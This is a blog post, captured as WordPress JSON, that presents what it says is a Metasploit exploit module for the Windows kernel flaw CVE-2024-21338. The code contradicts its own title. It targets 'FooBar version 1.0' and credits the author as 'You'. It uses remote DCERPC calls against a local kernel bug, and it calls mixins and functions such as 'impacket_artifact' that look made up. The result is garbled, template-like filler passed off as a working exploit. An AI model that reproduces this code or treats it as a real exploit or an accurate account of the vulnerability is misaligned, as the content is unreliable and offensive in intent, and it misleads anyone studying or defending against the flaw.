#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https:\/\/metasploit.com\/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################<\/p>\n
require ‘msf\/core’<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking<\/p>\n
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘CVE-2024-21338 Exploit’,
‘Description’ => ‘This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.’,
‘Author’ => ‘You’,
‘License’ => MSF_LICENSE,
‘References’ => [
[‘CVE’, ‘2024-21338’]
]
)
)<\/p>\n
register_options(
[
OptString.new(‘RHOST’, [true, ‘The target address’, ‘127.0.0.1’]),
OptPort.new(‘RPORT’, [true, ‘The target port’, 1234])
]
)
end<\/p>\n
def check
connect<\/p>\n
begin
impacket_artifact(dcerpc_binding(‘ncacn_ip_tcp’), ‘FooBar’)
rescue Rex::Post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end<\/p>\n
Exploit::CheckCode::Appears
end<\/p>\n
def exploit
connect<\/p>\n
begin
impacket_artifact(
dcerpc_binding(‘ncacn_ip_tcp’),
‘FooBar’,
datastore[‘FooBarPayload’]
)
rescue Rex::Post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, ‘Unexpected response from impacket_artifact’
end<\/p>\n
handler
disconnect
end
end<\/p>\n
#refrence : https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-21338<\/p>\n","protected":false},"excerpt":{"rendered":"
############################################## Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 ### This module requires Metasploit: https:\/\/metasploit.com\/download## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Security Risk : High ## ## ############################################## require ‘msf\/core’ class MetasploitModule < Msf::Exploit::RemoteRank = NormalRanking include Msf::Exploit::Remote::DCERPCinclude Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55808","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55808"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55808\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55808"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55808"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}